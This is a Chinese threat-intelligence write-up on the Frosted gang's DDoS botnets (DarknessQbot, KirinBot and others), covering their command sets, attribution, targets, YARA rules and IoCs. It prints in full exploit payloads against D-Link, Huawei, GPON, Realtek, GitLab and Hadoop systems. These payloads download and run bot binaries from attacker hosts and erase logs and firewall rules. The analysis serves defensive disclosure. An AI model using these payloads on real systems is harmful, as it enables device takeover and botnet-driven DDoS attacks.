起底Frosted DDoS攻击团伙
2023-6-30 11:44:52 Author: www.freebuf.com(查看原文) 阅读量:7 收藏

概述

随着僵尸网络泄露源码的普及,构建一个僵尸网络的门槛越来越低,同时编写一个僵尸网络的门槛也随之变低,攻击者可以通过拼凑源码轻而易举的创建一个僵尸网络,本次披露的 DarknessQbot 就是一个例子,该家族融合几个流行的恶意软件家族的代码,最后可以对游戏行业进行相当成功的攻击。因此,僵尸网络和DDoS攻击的防范成为了当下不得不重视的一个问题。

对该僵尸网络进行溯源时我们发现,CNCERT 物联网威胁研究团队和绿盟科技伏影实验室于2022年12月发表的一份联合报告对本次发现的僵尸网络作者曾进行过披露,并将该僵尸网络犯罪团伙命名为 Frosted,我们猜测是通过僵尸网络作者的ID进行团伙的命名,本文将详细披露 Frosted 僵尸网络犯罪团伙。(下文中将该僵尸网络称为 Darkness)

Darkness Botnet 近90天传播趋势如下:

1688095787_649e4c2bbac0bf6fb6998.png!small?1688095788099

僵尸网络武器库

DarknessQbot

2023 年 6月初,奇安信威胁情报中心威胁监控系统监测到一起未知家族恶意样本利用CVE-2021-22205漏洞传播的事件,经过分析确认该样本不属于已知的僵尸网络家族。通过对该家族的特征进行分析,我们将此新型僵尸网络称为 DarknessQbot。

对该僵尸网络进行分析,该家族通过几个流行的恶意软件家族(Mirai、Gafgyt 和 Qbot)的代码创建而成,其支持的DDoS攻击方法如下:

Usage

Name

!udp <target> <port> <time> <packetsize>

udpflood

!tcp <target> <port> <time> <packetsize> <flag(s)>

tcpflood

!onepacket <target> <port> <time>

onepacket

!zgoflood <target> <port> <time>

zgoflood

!socketflood <target> <port> <time>

socketflood

!junkflood <target> <port> <time>

junkflood

!std <target> <port> <time> <packetsize>

stdflood

!randflood <target> <port> <time> <packetsize>

randflood

@c2 <c2 ip> <c2 port> <seconds> <threads>

c2flood

DarknessQbot 支持下发指令调用 mirai 的 killer_init 方法,同时保留了 table 加密特性以防止安全人员对内存搜索其特征:

1688095850_649e4c6ae4b5274e1e78e.png!small?1688095851378

DarknessQbot 支持下发指令激活两种方法进行漏洞扫描从而大规模传播,分别针对 D-Link 和华为路由器,payload EXP 如下:

D-Link Remote Command Execution:

GET /login.cgi?cli=aa ;wget http://nomiddleman.ddns.net/nips -O /tmp/vv ;sh /tmp/vv ;wget http://nomiddleman.ddns.net/bob -O /tmp/cc ;sh /tmp/cc ;wget http://nomiddleman.ddns.net/forearm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: /\r\nUser-Agent: Blade/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;

华为路由器 CVE-2017-17215:

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nContent-Length: 430\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget http://nomiddleman.ddns.net/nips -O /tmp/vv; /bin/busybox chmod 777 * /tmp/vv; sh /tmp/vv)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

KirinBot

Darkness作者还拥有一个名为 Kirin 的僵尸网络,发现时正通过漏洞 CVE-2021-22205 进行传播。

该僵尸网络使用 Gafgyt 源码进行修改,其上线包中包含特征字符串 "Kirin":

1688095966_649e4cdecbdfbdf3577c2.png!small?1688095967317

Kirin 支持多种 DDoS 方法如下:

Name

HEX

UDP

VSE

STD

ACK

ONEPACKET

ZGO

SOCKET

UDPBYPASS

LYNX

与 DarknessQbot 相似,KirinBot 支持下发指令激活漏洞扫描从而进行传播,但是KirinBot 所支持的方法更多,除了 D-Link 设备和华为路由器设备的漏洞利用以外,还针对 GPON 路由器和 REALTEK 设备,其对应 payload EXP 如下:

GPON CVE-2018-10561:

POST /GponForm/diag_Form?images/ HTTP/1.1\r\nUser-Agent: Hello, World\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://37.44.238.182/gpon+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0")

REALTEK CVE-2014-8361:

POST /picsdesc.xml HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`wget http://37.44.238.182/real.sh -O - > /var/fkra;sh/var/fkra`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n")

漏洞扫描以外,KirinBot 样本还支持下发指令进行 Telnet 弱口令爆破:

1688096084_649e4d54557948b17be10.png!small?1688096084984

样本中内置的弱口令与Mirai类似,利用 table 的方式异或解密:

1688096091_649e4d5b1639fd85506d1.png!small?1688096092228

除了上述的指令,KirinBot 还支持 Update 及 Kill 命令进行样本更新和结束指定进程。

Mirai_Fro、Gafgyt_Fro

这两个家族使用传统的 Mirai 和 Gafgyt 源码,在CNCERT 物联网威胁研究团队和绿盟科技伏影实验室披露“Frosted”僵尸网络犯罪团伙的文章中提起。

我们在这里不做过多赘述,编写了两个家族的 Yara 规则供大家参考:

rule Mirai_Fro

{

meta:

author = "WPeace"

strings:

$elf = "\x7FELF"

$onlinePack = "Device Connected"

$commandStr_0 = "NOOOOOOOOOOOOOOOOOOOO"

$commandStr_1 = "KPAC"

$commandStr_2 = "DAVE"

$commandStr_3 = "NFODROP"

$commandStr_4 = "STOP"

condition:

all of them

}

rule Gafgyt_Fro

{

meta:

author = "WPeace"

strings:

$elf = "\x7FELF"

$authorStr = "FrostedFlakes666"

$onlinePack = "Kansen shita"

$commandStr_0 = "CMD"

$commandStr_1 = "CREG"

$commandStr_2 = "KPAC"

$commandStr_3 = "GETPUBLICIP"

condition:

all of them

}

更多的漏洞利用

除了利用样本中的漏洞扫描方法以外,攻击者通常会通过扫描器利用漏洞 CVE-2021-22205 传播其拥有的多个僵尸网络家族二进制文件,并且存在同一个 payload 下发多个家族样本的情况,示例如下:

(metadata.(Copyright "\" . qx{TF=$(mktemp -u);mkfifo $TF && rm -rf roof;wget http://37.44.238.182/bins/kirin.x86 ; chmod 777 * ; ./kirin.x86 ;rm -rf kirin.x86; wget http://37.44.238.191/roof; curl -O http://37.44.238.191/roof; chmod +x roof; ./roof x86 0<$TF | sh 1>$TF} . \" b ")

另外还发现了该攻击者利用 Hadoop Yarn 未授权漏洞诱骗服务器下载并运行其僵尸网络文件:

/ws/v1/cluster/apps

{"am-container-spec": {"commands": {"command": "cd /tmp ; pkill -9 roof ; get

http://37.44.238.191/roof; chmod 777 *; ./roof x86; rm -rf roof ; history -c"}}}

攻击者溯源分析

1688096299_649e4e2bf1434884c5ae8.png!small?1688096300654

Darkness僵尸网络作者最初的动机似乎只是为了自用,但后续逐步创建了自己的僵尸网络租赁团伙以此来获取收益,查看该作者的加密货币钱包,能够看出该作者通过自己的僵尸网络获取过多笔收益并且提现(这两个钱包仅是作为对作者的捐赠,并不计入 Botnet 租赁的收入):

1688096312_649e4e38902b7228fda4d.png!small?1688096313167

1688096317_649e4e3d34ebd170f95f2.png!small?1688096317790

Darkness僵尸网络的作者经常在其推特及 YouTube 账号发布 DDoS 攻击相关推文和视频推广其僵尸网络,不仅仅是为了证明其僵尸网络威力和有效性,还有以炫耀的目的博取眼球,有时甚至会艾特受害者告知其是被自己的买家所攻击:

1688096322_649e4e4242efdaa6b494c.png!small?1688096322830

该作者还炫耀过自己团队用黑客产业所赚取的费用(可以看出来确实挺赚钱的 /doge):

1688096330_649e4e4a5161d8c9dcb83.png!small?1688096331020

进行追踪时我们发现,Darkness僵尸网络的作者声称自己来自国际黑客组织 LateSec,并且曾经有过网站想暗示其 Lizard Squad 团队成员身份,但是经过分析其黑客组织身份可信度较低:

1688096336_649e4e50b14a62669486e.png!small?1688096337170

规模及攻击目标

Darkness僵尸网络其拥有者于2022年11月公布其规模为400+,可以看出规模并不是很大,但是却可以有效地针对游戏行业进行攻击,曾发起的 DDoS 攻击使 Roblox 平台官网瘫痪:

1688096346_649e4e5a3951e35f8f8f2.png!small?1688096347270

该僵尸网络还对多个游戏服务器进行过攻击,于2022年5月攻击了 Rogue Company 服务器,2022年6月攻击了 AmongUs 服务器:

1688096351_649e4e5fa9ce48e3152ca.png!small?1688096352370

1688096357_649e4e657d4553fc12352.png!small?1688096359963

奇安信威胁情报中心当前已对 Frosted 团伙的 Darkness 僵尸网络进行监控,并在分析过程中获取到了攻击者下发的若干攻击指令:

1688096365_649e4e6d15537547e674e.png!small?1688096365924

IoCs

MD5:

1F972A1CE378A6BD1320523D9A7E5707

6714908C334E2A324AAC93E9886F9660

742D719FA396FA41442BB8B6285FCD64

47024197FAF8C15A5C606A65D2205104

C&C:

193.35.18.220:420

193.35.18.220:101

5.252.177.118:998

178.63.167.41:26663


文章来源: https://www.freebuf.com/articles/paper/370797.html
如有侵权请联系:admin#unsafe.sh